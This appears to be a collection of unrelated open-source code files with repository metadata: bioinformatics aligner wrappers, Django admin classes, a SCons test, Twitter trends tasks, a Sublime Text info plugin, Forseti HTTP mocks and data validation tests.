def replaceENAHeader(file_path, file_out):
"""
The ENA header has pipes in the header as part of the stable_id. This
function removes the ENA stable_id and replaces it with the final
section after splitting the stable ID on the pipe.
"""
with open(file_out, 'w') as new_file:
with open(file_path) as old_file:
for line in old_file:
if line[0] == '>':
space_line = line.split(" ")
new_file.write(">" + space_line[0].split("|")[-1].replace(">", "") + "\n")
else:
new_file.write(line)
return True
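    # For example (illustrative header, not a real record):
    #   >ENA|ABC123|ABC123.1 some description   becomes   >ABC123.1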
@staticmethod
def gem_index_genome(genome_file, index_name=None):
"""
Create an index of the genome FASTA file with GEM. These are saved
alongside the assembly file.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
"""
if not index_name:
index_name = genome_file
command_line = 'gem-indexer -i ' + genome_file + ' -o ' + index_name
args = shlex.split(command_line)
process = subprocess.Popen(args)
process.wait()
return True
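    # Illustrative call (path is hypothetical):
    #   alignerUtils.gem_index_genome('/<data_dir>/human_GRCh38.fa')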
@staticmethod
def bowtie_index_genome(genome_file):
"""
Create an index of the genome FASTA file with Bowtie2. These are saved
alongside the assembly file.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
"""
file_name = os.path.split(genome_file)
bt2_1_name = genome_file + ".1.bt2"
bt2_2_name = genome_file + ".2.bt2"
bt2_3_name = genome_file + ".3.bt2"
bt2_4_name = genome_file + ".4.bt2"
rev1_bt2_name = genome_file + ".rev.1.bt2"
rev2_bt2_name = genome_file + ".rev.2.bt2"
with cd(file_name[0]):
command_line = 'bowtie2-build ' + genome_file + ' ' + genome_file
args = shlex.split(command_line)
process = subprocess.Popen(args)
process.wait()
return (bt2_1_name, bt2_2_name, bt2_3_name, bt2_4_name, rev1_bt2_name, rev2_bt2_name)
def bowtie2_untar_index(self, genome_name, tar_file, # pylint: disable=too-many-arguments
bt2_1_file, bt2_2_file, bt2_3_file, bt2_4_file,
bt2_rev1_file, bt2_rev2_file):
"""
Extracts the BWA index files from the genome index tar file.
Parameters
----------
genome_file_name : str
Location string of the genome fasta file
tar_file : str
Location of the Bowtie2 index file
bt2_1_file : str
Location of the amb index file
bt2_2_file : str
Location of the ann index file
bt2_3_file : str
Location of the bwt index file
bt2_4_file : str
Location of the pac index file
bt2_rev1_file : str
Location of the sa index file
bt2_rev2_file : str
Location of the sa index file
Returns
-------
bool
Boolean indicating if the task was successful
"""
index_files = {
"1.bt2": bt2_1_file,
"2.bt2": bt2_2_file,
"3.bt2": bt2_3_file,
"4.bt2": bt2_4_file,
"rev.1.bt2": bt2_rev1_file,
"rev.2.bt2": bt2_rev2_file,
}
return self._untar_index(genome_name, tar_file, index_files)
@staticmethod
def bwa_index_genome(genome_file):
"""
Create an index of the genome FASTA file with BWA. These are saved
alongside the assembly file. If the index has already been generated
then the locations of the files are returned
Parameters
----------
genome_file : str
Location of the assembly file in the file system
Returns
-------
amb_file : str
Location of the amb file
ann_file : str
Location of the ann file
bwt_file : str
Location of the bwt file
pac_file : str
Location of the pac file
sa_file : str
Location of the sa file
Example
-------
.. code-block:: python
:linenos:
from tool.aligner_utils import alignerUtils
au_handle = alignerUtils()
indexes = au_handle.bwa_index_genome('/<data_dir>/human_GRCh38.fa.gz')
print(indexes)
"""
command_line = 'bwa index ' + genome_file
amb_name = genome_file + '.amb'
ann_name = genome_file + '.ann'
bwt_name = genome_file + '.bwt'
pac_name = genome_file + '.pac'
sa_name = genome_file + '.sa'
if os.path.isfile(bwt_name) is False:
args = shlex.split(command_line)
process = subprocess.Popen(args)
process.wait()
return (amb_name, ann_name, bwt_name, pac_name, sa_name)
def bwa_untar_index(self, genome_name, tar_file, # pylint: disable=too-many-arguments
amb_file, ann_file, bwt_file, pac_file, sa_file):
"""
Extracts the BWA index files from the genome index tar file.
Parameters
----------
genome_file_name : str
Location string of the genome fasta file
genome_idx : str
Location of the BWA index file
amb_file : str
Location of the amb index file
ann_file : str
Location of the ann index file
bwt_file : str
Location of the bwt index file
pac_file : str
Location of the pac index file
sa_file : str
Location of the sa index file
Returns
-------
bool
Boolean indicating if the task was successful
"""
index_files = {
"amb": amb_file,
"ann": ann_file,
"bwt": bwt_file,
"pac": pac_file,
"sa": sa_file
}
return self._untar_index(genome_name, tar_file, index_files)
@staticmethod
def _untar_index(genome_name, tar_file, index_files):
"""
Untar the specified files for a genomic index into the specified
location.
Parameters
----------
genome_name : str
Name of the genome for the folder within the tar file
tar_file : str
Location of the tarred index files
index_files : dict
Dictionary object of the suffix and final index file location
"""
try:
g_dir = os.path.split(tar_file)[0]
tar = tarfile.open(tar_file)
tar.extractall(path=g_dir)
tar.close()
gidx_folder = tar_file.replace('.tar.gz', '/') + genome_name
            piece_size = 5120000  # copy in ~5 MB chunks
for suffix in list(index_files.keys()):
with open(index_files[suffix], "wb") as f_out:
with open(gidx_folder + "." + suffix, "rb") as f_in:
while True:
piece = f_in.read(piece_size)
if not piece:
break # end of file
print("PIECE:", piece[0:5])
f_out.write(piece)
shutil.rmtree(tar_file.replace('.tar.gz', ''))
except (OSError, IOError) as error:
logger.fatal("UNTAR: I/O error({0}): {1}".format(error.errno, error.strerror))
return False
return True
@staticmethod
def bowtie2_align_reads(
genome_file, bam_loc, params, reads_file_1, reads_file_2=None):
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
reads = ["-U", reads_file_1]
if reads_file_2 is not None:
reads = [
"-1", reads_file_1,
"-2", reads_file_2
]
logger.info(genome_file)
logger.info(' '.join(params))
cmd_aln = ' '.join([
'bowtie2',
'-p 4',
'-x', genome_file,
'-S', reads_file_1 + '.sam',
' '.join(params),
] + reads)
try:
logger.info("BOWTIE2 COMMAND: " + cmd_aln)
process = subprocess.Popen(cmd_aln, shell=True)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_aln))
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file_1 + '.sam', bam_loc)
if return_val:
os.remove(reads_file_1 + '.sam')
else:
logger.warn("IO error with {} to {}".format(reads_file_1 + '.sam', bam_loc))
return return_val
def _bwa_aln_sai(self, genome_file, reads_file, params, single=True): # pylint: disable=no-self-use
"""
Generate the sai files required for creating the sam file.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
params : dict
Dictionary of the parameters for bwa aln
single : bool
True for single ended, will use 4 threads for processing
False for paired end, will use 2 threads for processing
"""
threads = "2"
if single:
threads = "4"
cmd_aln_sai = ' '.join([
'bwa aln',
'-t', threads,
'-q', '5',
' '.join(params),
'-f', reads_file + '.sai',
genome_file, reads_file
])
try:
logger.info("BWA ALN COMMAND: " + cmd_aln_sai)
process = subprocess.Popen(cmd_aln_sai, shell=True)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_aln_sai))
def bwa_aln_align_reads_single(self, genome_file, reads_file, bam_loc, params):
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
cmd_samse = ' '.join([
'bwa samse',
'-f', reads_file + '.sam',
genome_file, reads_file + '.sai', reads_file
])
self._bwa_aln_sai(genome_file, reads_file, params, True)
try:
logger.info("BWA ALN COMMAND: " + cmd_samse)
process = subprocess.Popen(
cmd_samse, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
proc_out, proc_err = process.communicate() # pylint: disable=unused-variable
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_samse))
proc_out, proc_err = process.communicate()
logger.fatal("BWA ALN stderr" + proc_err)
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file + '.sam', bam_loc)
if return_val:
os.remove(reads_file + '.sam')
os.remove(reads_file + '.sai')
else:
logger.warn("IO error with {} to {}".format(reads_file + '.sam', bam_loc))
return return_val
def bwa_aln_align_reads_paired(self, genome_file, reads_file_1, reads_file_2, bam_loc, params): # pylint: disable=too-many-arguments
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
cmd_samse = ' '.join([
'bwa sampe',
'-f', reads_file_1 + '.sam',
genome_file,
reads_file_1 + '.sai', reads_file_2 + '.sai',
reads_file_1, reads_file_2
])
try:
import multiprocessing
f1_proc = multiprocessing.Process(
name='fastq_1', target=self._bwa_aln_sai,
args=(genome_file, reads_file_1, params, False)
)
f2_proc = multiprocessing.Process(
name='fastq_2', target=self._bwa_aln_sai,
args=(genome_file, reads_file_2, params, False)
)
f1_proc.start()
f2_proc.start()
f1_proc.join()
f2_proc.join()
except (OSError, IOError) as msg:
logger.info("SAI ERROR: I/O error({0}): {1}".format(
msg.errno, msg.strerror))
return False
try:
logger.info("BWA ALN COMMAND: " + cmd_samse)
process = subprocess.Popen(cmd_samse, shell=True)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_samse))
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file_1 + '.sam', bam_loc)
if return_val:
os.remove(reads_file_1 + '.sam')
os.remove(reads_file_1 + '.sai')
os.remove(reads_file_2 + '.sai')
else:
logger.warn("IO error with {} to {}".format(reads_file_1 + '.sam', bam_loc))
return return_val
@staticmethod
def bwa_mem_align_reads(
genome_file, bam_loc, params, reads_file_1, reads_file_2=None):
"""
Map the reads to the genome using BWA.
Parameters
----------
genome_file : str
Location of the assembly file in the file system
reads_file : str
Location of the reads file in the file system
bam_loc : str
Location of the output file
"""
reads = [reads_file_1]
if reads_file_2 is not None:
reads.append(reads_file_2)
cmd_aln = ' '.join([
'bwa mem -t 4',
' '.join(params),
genome_file
] + reads)
try:
with open(reads_file_1 + '.sam', "w") as f_out:
logger.info("BWA MEM COMMAND: " + cmd_aln)
process = subprocess.Popen(cmd_aln, shell=True, stdout=f_out)
process.wait()
except (OSError, IOError) as msg:
logger.info("I/O error({0}): {1}\n{2}".format(
msg.errno, msg.strerror, cmd_aln))
return False
bu_handle = bamUtils()
return_val = bu_handle.sam_to_bam(reads_file_1 + '.sam', bam_loc)
if return_val:
os.remove(reads_file_1 + '.sam')
else:
logger.warn("IO error with {} to {}".format(reads_file_1 + '.sam', bam_loc))
return return_val
|
apache-2.0
| 5,386,583,190,350,845,000 | 30.951128 | 137 | 0.527062 | false |
BirkbeckCTP/janeway
|
src/review/admin.py
|
1
|
3043
|
__copyright__ = "Copyright 2017 Birkbeck, University of London"
__author__ = "Martin Paul Eve & Andy Byers"
__license__ = "AGPL v3"
__maintainer__ = "Birkbeck Centre for Technology and Publishing"
from django.contrib import admin
from review import models
class EditorialAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'editor', 'editor_type', 'assigned')
list_filter = ('article', 'editor', 'editor_type')
raw_id_fields = ('article', 'editor')
class ReviewRoundAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'round_number', 'date_started')
list_filter = ('article',)
raw_id_fields = ('article',)
filter_horizontal = ('review_files',)
class ReviewAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'reviewer', 'editor', 'review_round', 'decision', 'date_due', 'is_complete')
list_filter = ('article', 'reviewer', 'editor')
raw_id_fields = ('article', 'reviewer', 'editor', 'review_round', 'form')
class ReviewFormAdmin(admin.ModelAdmin):
list_display = ('name', 'journal', 'slug', 'deleted')
list_filter = ('journal', 'deleted')
filter_horizontal = ('elements',)
class ElementAdmin(admin.ModelAdmin):
list_display = ('name', 'kind', 'required', 'order', 'width')
class AnswerAdmin(admin.ModelAdmin):
list_display = ('pk', 'assignment', 'frozen_element', 'author_can_see')
list_filter = ('assignment',)
raw_id_fields = ('assignment',)
class RatingAdmin(admin.ModelAdmin):
list_display = ('pk', 'reviewer', 'rating', 'rater')
list_filter = ('assignment', 'rater')
raw_id_fields = ('assignment', 'rater')
def reviewer(self, obj):
return obj.assignment.reviewer
class RevisionActionAdmin(admin.ModelAdmin):
list_display = ('pk', 'logged', 'user')
class RevisionAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'editor', 'date_requested', 'date_due')
list_filter = ('article', 'editor')
raw_id_fields = ('article', 'editor')
filter_horizontal = ('actions',)
class EditorOverrideAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'editor', 'overwritten')
list_filter = ('article', 'editor')
raw_id_fields = ('article', 'editor')
class DraftAdmin(admin.ModelAdmin):
list_display = ('pk', 'article', 'section_editor', 'decision', 'drafted', 'editor_decision')
list_filter = ('article', 'section_editor', 'decision', 'editor_decision')
raw_id_fields = ('article', 'section_editor')
admin_list = [
(models.EditorAssignment, EditorialAdmin),
(models.ReviewAssignment, ReviewAdmin),
(models.ReviewForm, ReviewFormAdmin),
(models.ReviewFormElement, ElementAdmin),
(models.ReviewAssignmentAnswer, AnswerAdmin),
(models.ReviewRound, ReviewRoundAdmin),
(models.ReviewerRating, RatingAdmin),
(models.RevisionAction, RevisionActionAdmin),
(models.RevisionRequest, RevisionAdmin),
(models.EditorOverride, EditorOverrideAdmin),
(models.DecisionDraft, DraftAdmin),
]
[admin.site.register(*t) for t in admin_list]
|
agpl-3.0
| -8,894,576,554,807,835,000 | 32.43956 | 113 | 0.669405 | false |
EmanueleCannizzaro/scons
|
test/scons-time/obj/file.py
|
1
|
2296
|
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/scons-time/obj/file.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that config files specified with the -f and --file options
affect how the obj subcommand processes things.
"""
import TestSCons_time
test = TestSCons_time.TestSCons_time()
test.fake_logfile('foo-001-0.log')
test.fake_logfile('foo-002-0.log')
test.write('st1.conf', """\
prefix = 'foo-001'
""")
expect1 = """\
pre-read post-read pre-build post-build
16010 16020 16030 16040 foo-001-0.log
"""
test.run(arguments = 'obj -f st1.conf Node.FS.Base', stdout = expect1)
test.write('st2.conf', """\
prefix = 'foo'
title = 'ST2.CONF TITLE'
vertical_bars = (
( 1.5, 7, None ),
)
""")
expect2 = \
r"""set title "ST2.CONF TITLE"
set key bottom left
plot '-' title "Startup" with lines lt 1, \
'-' notitle with lines lt 7
# Startup
1 16040.000
2 16040.000
e
1.5 0
1.5 18000
e
"""
test.run(arguments = 'obj --file st2.conf --fmt gnuplot Node.FS.Base', stdout = expect2)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
mit
| -6,706,845,236,707,202,000 | 26.333333 | 101 | 0.70993 | false |
google/starthinker
|
starthinker/task/twitter/run.py
|
1
|
4957
|
###########################################################################
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
# SEE: https://github.com/geduldig/TwitterAPI
# SEE: https://developer.twitter.com/en/docs/basics/rate-limits
from time import sleep
from TwitterAPI import TwitterAPI
from starthinker.util.data import get_rows, put_rows
# FOR WOEID SEE
# http://cagricelebi.com/blog/dear-twitter-please-stop-using-woeid/
# https://archive.org/details/geoplanet_data_7.10.0.zip
# https://github.com/Ray-SunR/woeid
# https://stackoverflow.com/questions/12434591/get-woeid-from-city-name
TWITTER_API = None
def get_twitter_api(config, task):
global TWITTER_API
if TWITTER_API is None:
TWITTER_API = TwitterAPI(
task['key'], task['secret'], auth_type='oAuth2')
return TWITTER_API
TWITTER_TRENDS_PLACE_SCHEMA = [
{
'name': 'Woeid',
'type': 'INTEGER'
},
{
'name': 'Name',
'type': 'STRING'
},
{
'name': 'Url',
'type': 'STRING'
},
{
'name': 'Promoted_Content',
'type': 'STRING',
'mode': 'NULLABLE'
},
{
'name': 'Query',
'type': 'STRING',
},
{
'name': 'Tweet_Volume',
'type': 'INTEGER'
},
]
def twitter_trends_places(config, task):
if config.verbose:
print('TWITTER TRENDS PLACE')
print('PL',
list(get_rows(config, task['auth'], task['trends']['places'])))
for place in get_rows(config, task['auth'], task['trends']['places']):
if config.verbose:
print('PLACE', place)
results = get_twitter_api(config, task).request('trends/place', {'id': int(place)})
for r in results:
if config.verbose:
print('RESULT', r['name'])
yield [
place, r['name'], r['url'], r['promoted_content'], r['query'],
r['tweet_volume']
]
print('.', end='')
    sleep(15 * 60 / 75)  # throttle to 75 requests per 15-minute window (TODO: improve to retry)
TWITTER_TRENDS_CLOSEST_SCHEMA = [
{
'name': 'Latitude',
'type': 'FLOAT'
},
{
'name': 'Longitude',
'type': 'FLOAT'
},
{
'name': 'Country',
'type': 'STRING'
},
{
'name': 'Country_Code',
'type': 'STRING'
},
{
'name': 'Name',
'type': 'STRING',
'mode': 'NULLABLE'
},
{
'name': 'Parent_Id',
'type': 'INTEGER',
},
{
'name': 'Place_Type_Code',
'type': 'INTEGER'
},
{
'name': 'Place_Type_Name',
'type': 'STRING'
},
{
'name': 'URL',
'type': 'STRING'
},
{
'name': 'Woeid',
'type': 'INTEGER'
},
]
def twitter_trends_closest(config, task):
if config.verbose:
print('TWITTER TRENDS CLOSEST')
for row in get_rows(config, task['auth'], task['trends']['closest']):
lat, lon = row[0], row[1]
    results = get_twitter_api(config, task).request('trends/closest', {'lat': lat, 'long': lon})
for r in results:
yield [
lat, lon, r['country'], r['countryCode'], r['name'], r['parentid'],
r['placeType']['code'], r['placeType']['name'], r['url'], r['woeid']
]
TWITTER_TRENDS_AVAILABLE_SCHEMA = TWITTER_TRENDS_CLOSEST_SCHEMA
def twitter_trends_available(config, task):
if config.verbose:
print('TWITTER TRENDS AVAILABLE')
  results = get_twitter_api(config, task).request('trends/available', {})
for r in results:
yield [
r['country'], r['countryCode'], r['name'], r['parentid'],
r['placeType']['code'], r['placeType']['name'], r['url'], r['woeid']
]
def twitter(config, task):
if config.verbose:
print('TWITTER')
rows = None
if 'trends' in task:
if 'places' in task['trends']:
rows = twitter_trends_places(config, task)
task['out']['bigquery']['schema'] = TWITTER_TRENDS_PLACE_SCHEMA
task['out']['bigquery']['skip_rows'] = 0
elif 'closest' in task['trends']:
rows = twitter_trends_closest(config, task)
task['out']['bigquery']['schema'] = TWITTER_TRENDS_CLOSEST_SCHEMA
task['out']['bigquery']['skip_rows'] = 0
else:
rows = twitter_trends_available(config, task)
task['out']['bigquery'][
'schema'] = TWITTER_TRENDS_AVAILABLE_SCHEMA
task['out']['bigquery']['skip_rows'] = 0
if rows:
put_rows(config, task['auth'], task['out'], rows)
|
apache-2.0
| -3,063,663,681,258,404,400 | 25.367021 | 87 | 0.556385 | false |
facelessuser/SublimeRandomCrap
|
sublime_info.py
|
1
|
2894
|
"""
SublimeInfo Sublime Plugin.
Show info about the system and the current Sublime Text instance.
```
//////////////////////////////////
// Info Commands
//////////////////////////////////
{
"caption": "Sublime Info",
"command": "sublime_info"
},
```
Licensed under MIT
Copyright (c) 2013-2019 Isaac Muse <isaacmuse@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import socket
import sublime
import sublime_plugin
import urllib.request as urllibreq
import traceback
INFO = '''
Platform: {platform}
Hostname: {hostname}
Sublime Version: {version}
Architecture: {arch}
Local IP: {l_ip}
External IP: {e_ip}
'''
def external_ip():
"""Get external IP."""
try:
with urllibreq.urlopen("https://www.myexternalip.com/raw") as url:
e_ip = url.read().decode("utf-8")
except Exception:
e_ip = "???"
print(traceback.format_exc())
return e_ip
def local_ip():
"""Get local IP address."""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
l_ip = s.getsockname()[0]
except Exception:
l_ip = '???'
print(traceback.format_exc())
finally:
s.close()
return l_ip
class SublimeInfoCommand(sublime_plugin.ApplicationCommand):
"""Sublime info command."""
def run(self):
"""Run the command."""
info = {
"platform": sublime.platform(),
"hostname": socket.gethostname().lower(),
"version": sublime.version(),
"arch": sublime.arch(),
"l_ip": local_ip(),
"e_ip": external_ip()
}
msg = INFO.format(**info)
# Show in a dialog, console, and copy to clipboard
sublime.message_dialog(msg)
sublime.set_clipboard(msg)
print("\nSublimeInfo: {}".format(msg))
|
mit
| 4,477,997,650,787,414,000 | 28.835052 | 111 | 0.64029 | false |
forseti-security/forseti-security
|
tests/common/gcp_api/test_data/http_mocks.py
|
1
|
1281
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test data for firewall api responses."""
from googleapiclient import http
from google.cloud.forseti.common.gcp_api import _base_repository
def mock_http_response(response, status='200'):
"""Set the mock response to an http request."""
http_mock = http.HttpMock()
http_mock.response_headers = {
'status': status,
'content-type': 'application/json',
}
http_mock.data = response
_base_repository.LOCAL_THREAD.http = http_mock
def mock_http_response_sequence(responses):
"""Set the mock response to an http request."""
http_mock = http.HttpMockSequence(responses)
_base_repository.LOCAL_THREAD.http = http_mock
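# Illustrative use in a test (payload is hypothetical):
#   mock_http_response('{"kind": "compute#firewallList"}')
#   mock_http_response_sequence([({'status': '200'}, '{}'),
#                                ({'status': '404'}, '')])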
|
apache-2.0
| -2,179,051,821,347,928,800 | 35.6 | 74 | 0.729899 | false |
fedspendingtransparency/data-act-broker-backend
|
tests/unit/dataactbroker/test_validation_helper.py
|
1
|
24369
|
import pandas as pd
from pandas.util.testing import assert_frame_equal
import numpy as np
import os
from dataactbroker.helpers import validation_helper
from dataactvalidator.app import ValidationManager, ValidationError
from dataactvalidator.filestreaming.csvReader import CsvReader
from dataactcore.models.validationModels import FileColumn
from dataactcore.models.lookups import FIELD_TYPE_DICT
FILES_DIR = os.path.join('tests', 'integration', 'data')
READ_ERROR = os.path.join(FILES_DIR, 'appropReadError.csv')
BLANK_C = os.path.join(FILES_DIR, 'awardFinancialBlank.csv')
def test_is_valid_type():
assert validation_helper.is_valid_type(None, 'STRING') is True
assert validation_helper.is_valid_type(None, 'INT') is True
assert validation_helper.is_valid_type(None, 'DECIMAL') is True
assert validation_helper.is_valid_type(None, 'BOOLEAN') is True
assert validation_helper.is_valid_type(None, 'LONG') is True
assert validation_helper.is_valid_type('1234Test', 'STRING') is True
assert validation_helper.is_valid_type('1234Test', 'INT') is False
assert validation_helper.is_valid_type('1234Test', 'DECIMAL') is False
assert validation_helper.is_valid_type('1234Test', 'BOOLEAN') is False
assert validation_helper.is_valid_type('1234Test', 'LONG') is False
assert validation_helper.is_valid_type('', 'STRING') is True
assert validation_helper.is_valid_type('', 'INT') is True
assert validation_helper.is_valid_type('', 'DECIMAL') is True
assert validation_helper.is_valid_type('', 'BOOLEAN') is True
assert validation_helper.is_valid_type('', 'LONG') is True
assert validation_helper.is_valid_type('01234', 'STRING') is True
assert validation_helper.is_valid_type('01234', 'INT') is True
assert validation_helper.is_valid_type('01234', 'DECIMAL') is True
assert validation_helper.is_valid_type('01234', 'LONG') is True
assert validation_helper.is_valid_type('01234', 'BOOLEAN') is False
assert validation_helper.is_valid_type('1234.0', 'STRING') is True
assert validation_helper.is_valid_type('1234.0', 'INT') is False
assert validation_helper.is_valid_type('1234.00', 'DECIMAL') is True
assert validation_helper.is_valid_type('1234.0', 'LONG') is False
assert validation_helper.is_valid_type('1234.0', 'BOOLEAN') is False
def test_clean_col():
# None cases
assert validation_helper.clean_col('') is None
assert validation_helper.clean_col(' ') is None
assert validation_helper.clean_col('\n') is None
assert validation_helper.clean_col('\"\"') is None
assert validation_helper.clean_col(np.nan) is None
assert validation_helper.clean_col(None) is None
# clean cases
assert validation_helper.clean_col('\nclean me! ') == "clean me!"
assert validation_helper.clean_col(0) == '0'
assert validation_helper.clean_col(1) == '1'
assert validation_helper.clean_col(' \" double quotes\"') == 'double quotes'
assert validation_helper.clean_col([]) == '[]'
assert validation_helper.clean_col({}) == '{}'
def test_clean_frame_vectorized():
df_under_test = pd.DataFrame([
['""', "", " lspace", '"lquote'],
["''", " ", "rspace ", 'rquote"'],
["'hello'", " ", " surround space ", '"surround quote"'],
['"hello"', "\n\t", None, '" surround quote and space "'],
['"hello you"', "5", np.NaN, ' " surround quote and space "\t'],
], columns=list("ABCD"))
df_under_test = validation_helper.clean_frame_vectorized(df_under_test)
expected_df = pd.DataFrame([
[None, None, "lspace", '"lquote'],
["''", None, "rspace", 'rquote"'],
["'hello'", None, "surround space", "surround quote"],
["hello", None, None, "surround quote and space"],
["hello you", "5", None, "surround quote and space"],
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_clean_frame_vectorized_mixed_types():
df_under_test = pd.DataFrame([
['""', "", np.NaN, '"25'],
["''", " ", "NaN", '-10"'],
["'10'", " ", np.int64(12), '"0"'],
[77, "\n\t", None, 0.0],
['"11 8"', "5", np.float64(8.2), '99\t'],
], columns=list("ABCD"))
df_under_test = validation_helper.clean_frame_vectorized(df_under_test, convert_to_str=True)
expected_df = pd.DataFrame([
[None, None, None, '"25'],
["''", None, "NaN", '-10"'],
["'10'", None, "12", "0"],
["77", None, None, "0.0"],
["11 8", "5", "8.2", "99"],
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_clean_numbers():
# Normal cases
assert validation_helper.clean_numbers('10') == '10'
assert validation_helper.clean_numbers('1,00') == '100'
assert validation_helper.clean_numbers('-10,000') == '-10000'
assert validation_helper.clean_numbers('0') == '0'
    # This was originally designed for just strings, but we should still account for these cases
assert validation_helper.clean_numbers(10) == '10'
assert validation_helper.clean_numbers(-10) == '-10'
assert validation_helper.clean_numbers(0) == '0'
assert validation_helper.clean_numbers(None) is None
assert validation_helper.clean_numbers(['A']) == ['A']
def test_clean_numbers_vectorized_all_strings():
df_under_test = pd.DataFrame([
["10,003,234", "bad,and", "2242424242", "-10"],
["0", "8", "9.424.2", "-10,000"],
["9.24242", ",2,094", ",01", ",-0,0"],
["1,45", "0055", None, np.NaN]
], columns=list("ABCD"))
for col in df_under_test.columns:
validation_helper.clean_numbers_vectorized(df_under_test[col])
expected_df = pd.DataFrame([
["10003234", "bad,and", "2242424242", "-10"],
["0", "8", "9.424.2", "-10000"],
["9.24242", "2094", "01", "-00"],
["145", "0055", None, np.NaN]
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_clean_numbers_vectorized_mixed_types():
df_under_test = pd.DataFrame([
["10,003,234", "bad,and", 2242424242, -10],
[0, 8, "9.424.2", -4.35],
[9.24242, ",2,094", ",01", -0],
["1,45", "0055", None, np.NaN]
], columns=list("ABCD"))
for col in df_under_test.columns:
validation_helper.clean_numbers_vectorized(df_under_test[col], convert_to_str=True)
expected_df = pd.DataFrame([
["10003234", "bad,and", 2242424242, -10],
[0, 8, "9.424.2", -4.35],
[9.24242, "2094", "01", -0],
["145", "0055", None, np.NaN]
], columns=list("ABCD"))
assert_frame_equal(df_under_test, expected_df)
def test_concat_flex():
# Tests a blank value, column sorting, ignoring row number, and the basic functionality
flex_row = {'row_number': '4', 'col 3': None, 'col 2': 'B', 'col 1': 'A'}
assert validation_helper.concat_flex(flex_row) == 'col 1: A, col 2: B, col 3: '
